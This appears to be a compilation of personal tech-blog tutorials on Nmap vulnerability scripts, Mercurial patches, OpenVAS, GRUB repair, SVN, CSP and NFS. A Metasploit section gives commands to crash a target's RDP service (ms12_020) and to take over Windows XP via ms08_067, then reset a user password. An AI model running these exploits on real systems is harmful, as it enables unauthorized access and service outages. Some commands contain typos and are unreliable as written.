How to Find Email Address Source?

You might receive a lot of emails from your friends. In this tutorial we will learn how to verify that the email you received is actually from your friend and not a fake email. Attackers can easily send fake email using websites such as "emkei.cz".

Steps:
1. Select an email that you want to trace.
2. Get its full headers. For example in GMail you need to click "More" options button next to "reply" button and select "Show original" option.
3. Copy all headers from top till the To field.
4. Open either "http://whatismyipaddress.com/trace-email" and paste headers into the headers text-area.
5. Click on the "Get Source" button to get IP address of the source.
6. You can use WhoIs service (http://whois.net/) to get more information about IP address. Copy paste IP address found in the step 5 and Click on the "Go" button to get more information about the source of the IP address.

Nmap usage to perform Vulnerability Assesments

NSE Documentation Portal [http://nmap.org/nsedoc/] provides a detail guide on nmap scripts usage.

Using nmap Scripts we can perform vulnerability assessments. 

In this tutorial I will show a few examples of nmap scripts. 

1. "smb-check-vulns" script to check Windows RPC vulnerabilities. 
Checks for vulnerabilities:

• MS08-067, a Windows RPC vulnerability
• Conficker, an infection by the Conficker worm
• Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000
• SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
• MS06-025, a Windows Ras RPC service vulnerability
• MS07-029, a Windows Dns Server RPC service vulnerability

Example:

$ nmap --script smb-check-vulns.nse -p445 <targetHostIP>

Or

$ sudo nmap  --script smb-check-vulns.nse --script-args=unsafe=1 -p445 <targetHostIP>

Output:

Host script results:| smb-check-vulns:
| MS08-067: NOT VULNERABLE| Conficker: Likely CLEAN| regsvc DoS: regsvc DoS: NOT VULNERABLE| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE| MS06-025: NO SERVICE (the Ras RPC service is inactive)|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

2. "nbstat" script to retrieve the target's NetBIOS names and MAC address.

By default, the script displays the name of the computer and the logged-in user; if the verbosity is turned up.

Example:

$ sudo nmap -sU --script nbstat.nse -p137 10.15.10.30

Output: 

Host script results:

| nbstat:  

|   NetBIOS name: IT-FS, NetBIOS user: <unknown>, NetBIOS MAC: 1c:6f:65:91:19:96

|   Names

|     IT-FS<00>            Flags: <unique><active>

|     IT-FS<20>            Flags: <unique><active>

|     IT-DEPT<00>          Flags: <group><active>

|     IT-DEPT<1c>          Flags: <group><active>

|     IT-DEPT<1e>          Flags: <group><active>

|     IT-DEPT<1d>          Flags: <unique><active>

|     \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>

|_    IT-DEPT<1b>          Flags: <unique><active>

3. "upnp-info" script to extract system information from the UPnP service.

Example:

$ nmap -sV -sC 10.15.10.30

Output:

Host script results:
|_nbstat: NetBIOS name: IT-FS, NetBIOS user: <unknown>, NetBIOS MAC: 1c:6f:65:91:19:96
| smb-os-discovery:  
|   OS: Windows Server 2003 3790 (Windows Server 2003 5.2)
|   Name: IT-DEPT\IT-FS
|_  System time: 2013-07-19 14:41:14 UTC+5.5
|_smbv2-enabled: Server doesn't support SMBv2 protocol

Creating a patch to checked-in for Mozilla

To create a patch that can be easily checked-in by others make following settings on your computer.

Create .hgrc file in HOME directory (such as "/home/username"), if its not already created. Add following code to it.

[ui]
username=yyyy@xxxxx.zzz

[defaults]
diff = -p -U 8
qdiff = -p -U 8
qnew = -U

[diff]
git=1
showfunc=1
unified=8

[extensions]
mq =


Save file and close it.

To generate a patch on HG (mercurial) repository:
$ hg diff  >  patchfilename

Discarding all local changes done in the HG (mercurial) repository:
$ hg revert -a


Use Mercurial Queuing extension to generate a patch for checked in:
# setup the patch queue directory (Deprecated in 1.5)
hg qinit

# create a new patch named firstpatch
hg qnew firstpatch

# edit some files
vi filename

# update the patch to contain your changes
hg qrefresh -m "Bug XXXXX - Testing message that goes with patch"

# vi .hg/patches/firstpatch to see the result
# print the current patch to the screen
hg qdiff

# make some more changes
vi filename

# see the differences not yet stored in the patch
hg diff

# update the patch
hg qrefresh

# Look at the patches you have applied
# Look at all the patches in the queue
hg qapplied
hg qseries

# remove the top patch
hg qpop

# apply the patch again
hg qpush

# remove all patches
hg qpop -a

# apply all patches
hg qpush -a

# Output all applied patches as a single patch
hg diff -r qparent:qtip

# update the commit message on a patch
hg qrefresh -m "New Message"

# Convert all applied patches into permanent changesets
hg qfinish -a

Patch to Upload on Bugzilla:
It is available in the following folder location:
/your_repository_folder/.hg/patches/

Or you can also use following command ot generate a patch to upload:
hg export qtip  > path_to_temp_patches/patchFileName.patch

Metasploit Usage for Exploitation

This tutorial is very general and I will continue updating it whenever I will find exploits and time to update this post.

1. If 3389/tcp  ms-term-serv is open then using metasploit you can cause remote machine to reboot or stop this service.

$ msfconsole 
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > set RHOST target-IP-Address
msf  auxiliary(ms12_020_maxchannelids) > exploit

Now rescan target computer, you will find that the ms-term-serv service is disabled.

2. Hacking Windows XP SP2/SP3 and get administrator access of the system. (Following exploit attacks on port 445)

$msfconsole
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST target-IP-Address
msf exploit(ms08_067_netapi) > exploit
meterpreter > shell

C:\Windows\System32\> net user
C:\Windows\System32\>  net user  userName password

OpenVAS Statup script for Kali linux

Following simple commands are useful to start openVAS on Kali linux.

Create a file "script.sh" and copy paste following contents:

#!/bin/bash

## Script by PATIL Kailas
echo -e "Script to run openVAS by PATIL Kailas.\n"

##Setting up nvt sync
echo "Syncing NVT Database..."
openvas-nvt-sync

#echo "Updating SCAP Data Feed"
#openvas-scapdata-sync

#echo "Updating CERT Feed.."
#openvas-certdata-sync

## Starting Services

echo "Starting OpenVAS Services..."

/etc/init.d/./greenbone-security-assistant start

/etc/init.d/./openvas-scanner start

/etc/init.d/./openvas-administrator start

/etc/init.d/./openvas-manager start

echo -e "Services Started!\nPlease Login via the Web UI @ https://127.0.0.1:9392 and confirm the secuity exception. \nDefault Username is admin and the password is the one you created during setup.\n"

echo -e "Launching WebUI \n"

gnome-open https://127.0.0.1:9392


Save file and run it whenever you want to use openVAS. 

Format Pen Drive (PD) or USB Drive on Ubuntu from Terminal

To format a Pend drive from terminal use following steps:
1. First of all connect your pen drive to computer and type the below command for know the name of your  USB drive.

$ dmseg  | tail

It will generate output as follows:


[20940.808432]  sdb: sdb1

[20940.811241] sd 7:0:0:0: [sdb] Attached SCSI removable disk

2. Now unmount your pen drive using the following command:

$ sudo umount /dev/sdb1

3. Then enter the following command to format your pen drive with FAT32 partition.

$ sudo mkfs.vfat -n 'Ubuntu' -I /dev/sdb1

Ubuntu 12.04 fresh installation failed to install GRUB

Ubuntu 12.04 LTS fresh installation even though completed successfully it might fail to install grub correctly on system.  In such a situation to install grub you can follow following steps using LiveCD or bootable installation disk.

Boot from LiveCD, open terminal and run following commands to note down drive and partition number on which Ubuntu is installed.

$sudo fdisk -l
OR
$sudo df -h

$sudo blkid   #it gives more information on partition and file system type

Now mount hard disk partition on which Ubuntu is installed.
$sudo  mount  /dev/saXY   /mnt   
Where X is drive letter such as a,b,c,, etc. and
Y is partition number such as 1, 5, 6, 8, etc,

For example:
  sudo mount /dev/sda8 /mnt

Now install grub loader.
$sudo  grub-install  --boot-directory=/mnt/boot    /dev/sdX   
For example:
  sudo grub-install --boot-rectory=/mnt/boot /dev/sda

--boot-directory is folder in which GRUB is located. It is normally /boot. Note that in above command we only provided sdX as input. We didn't use Y i.e. partition number.

In command prompt, do not install grub loader when your are inside the /mnt directory or the directory where your target hard disk is mounted.  It doesn't work sometime.

Being prompted for Password for '(null)' GNOME keyring

You can commit your project using subversion as follows:

svn commit -m “Your comment message goes here ”  - - username <yourusername>

Then the following prompt should be displayed to you for committing your project successfully…

Password for ‘<yourusername>’:

For this password, you should provide your <yourusername> password assigned to you while hosting your project.

First time commit to your project using svn commit will work properly.

However for subsequent commit to your project, you can get the prompt like...

Password for ‘(null)’ GNOME keyring:

The reason for above error message  is multiple keyrings are present on a users system. All users will have a default keyring, and another which is only stored in memory. For each commit, gnome-keyring stores the user details in another keyring. 

To disable keyring, open the config file in the subversion from the home folder as follows:

patilkr@patilkr-desktop:~$ cd .subversion/
patilkr@patilkr-desktop:~$ ls
auth  config  README.txt  servers

Open the ‘config’ file with any text editor,
patilkr@patilkr-desktop:~/.subversion$ gedit config
Inside the text file, look for the line ‘password-stores = no’ under ‘[auth]‘ section and uncomment it & remove the value ‘no’ for it to look like ‘password-stores = ‘. 
Then, save and close config file.
Finally, open another file named ‘servers’ in any text editor,
patilkr@patilkr-desktop:~/.subversion$ gedit servers
Inside the text file, look for the line ‘store-passwords = no’ under ‘[global]‘ section and just uncomment it. 
Then, save and close ‘servers’ file.

User Specified Content Security Policy

A Content Security Policy is a declarative policy that restricts what content can load on a page.  Its primary purpose is to mitigate Cross-Site Scripting vulnerabilities.  The core issue exploited by Cross-Site Scripting (XSS) attacks is the lack of knowledge in web browsers to distinguish between content that’s intended to be part of web application, and content that’s been maliciously injected into web application.

To address this problem, CSP defines the Content-Security-Policy HTTP header that allows web application developers to create a whitelist of sources of trusted content, and instruct the client browsers to only execute or render resources from those sources.  However, it is often difficult for developers to write a comprehensive Content Security Policy for their website.  They may worry about breaking their page by blocking unanticipated but necessary content.  They may not be able to easily change the CSP header for their site, which makes it challenging for them to experiment with policies until they find one that best protects their page without breaking site functionality.

UserCSP changes this!  A developer can now view the current policy applied to their site and create their own custom policy.  They can choose to apply their custom policy on the site, or even combine their policy with the website’s existing policy.  When combining policies, they have an option to choose from the strictest subset of the two, or the most lax subset.  They can locally test their site with the custom policy applied and tweak the policy until they have one that works.

The coolest feature of UserCSP is the Infer-CSP tab.  This feature can help a developer derive a usable and secure policy for their site.  By looking at the content the website loads, the add-on determines the strictest set of CSP rules it can apply to the site without breaking the current page.  The inferred policy is provided in the proper syntax for the CSP Header, so all a developer needs to do is start serving this policy for their site via the CSP header.

Please visit Tanvi's Blog on Mozilla for more information. 

Configure NFS on Ubuntu

Network File System (NFS) is useful to share space on other computers.

In this scenario we are going to configure NFS server on 10.1.1.15 host and NFS client on 10.1.1.17 machine.

1. Prerequisites
    Install nfs-common package on both NFS client and NFS server using following command.

     $ sudo apt-get install nfs-common

Additionally we need to install extra package on NFS server (10.1.1.15)

    $ sudo apt-get install nfs-kernel-server

This package is the actual NFS daemon listenning on both UDP and TCP 2049 ports. And portmap should be waiting for instructions on a port 111.

2. Create NFS Share on NFS Server (10.1.1.15)
Create a directory to share on NFS server(10.1.1.15).

Run following command on NFS server.

   $ mkdir /home/kailas

3. Apply Access Control Rules

In our scenario we want only 10.1.1.17 to access the nfs share.

Therefore, open /etc/exports file in any text editor (such as vi, gedit, or emacs) on NFS server (10.1.1.15).

Add following line in (/etc/exports) file.

A. Read/Write Permissions

    /home/kailas/     10.1.1.17(rw,sync)

Above line specifies that export /home/kailas directory for host with IP 10.1.1.17 with read, write permissions, synchronized mode.


B. Only Read Permissions

If you don't want to give write permission and only want to give read permission to client (10.1.1.17) then instead of above line use following line.

    /home/kailas/     10.1.1.17(ro,sync)

C. Read/Write + Root privileges

  /home/kailas/    10.1.1.17(rw,sync,no_root_squash)

Above line in "/etc/exports" file will export /home/kailas directory for host with an IP address 10.1.1.17 with read, write permissions, synchronized mode and the remote root user will be treated as a root and will be able to change any file and directory.

D. Read/Write Privilege to all computers on network

 /home/kailas/     *(rw,sync)

Above line indicates, export /home/kailas directory for any host with read, write permissions and synchronized mode.


E. Read Privilege to All computers on network

   /home/kailas/     *(ro,sync)

Above line indicates, export /home/kailas directory for any host with read only permissions and synchronized mode.


3. Restart NFS daemon

Use following command on Ubuntu to restart NFS service.

$ sudo /etc/init.d/nfs-kernel-server restart 

Note: After any modification you will made  in "/etc/exports" file please restart NFS service to reflect your changes. 


4. Mount NFS directory on client (10.1.1.17) machine

NFS client needs portmap service, simply install nfs-comman package on client (10.1.1.17)

   $ sudo apt-get install nfs-common


Make sure portmap service is running:
  $ sudo service portmap status

Sample outputs:
  portmap start/running, process 4193

If not just start it:
    $ sudo service portmap start

Create a mount directory on Client (10.1.1.17)
  $ sudo mkdir /nfs

$ sudo  mount  10.1.1.15:/home/kailas   /nfs/

To see the content of the directory use following command.
 $ ls /nfs


5. Configure automount

To make this completely transparent to end users, you can automount the NFS file system every time a user boots a Linux system. Simply edit "/etc/fstab" to mount system automatically during a system boot. You can use your favorite editor and create new line like this within /etc/fstab:

10.1.1.15:/home/kailas   /nfs/  nfs  defaults  0  0


 6. Appendix

If above steps doesn't work then please try to stop iptables or configure iptable rules to allow nfs communication.

# service iptables stop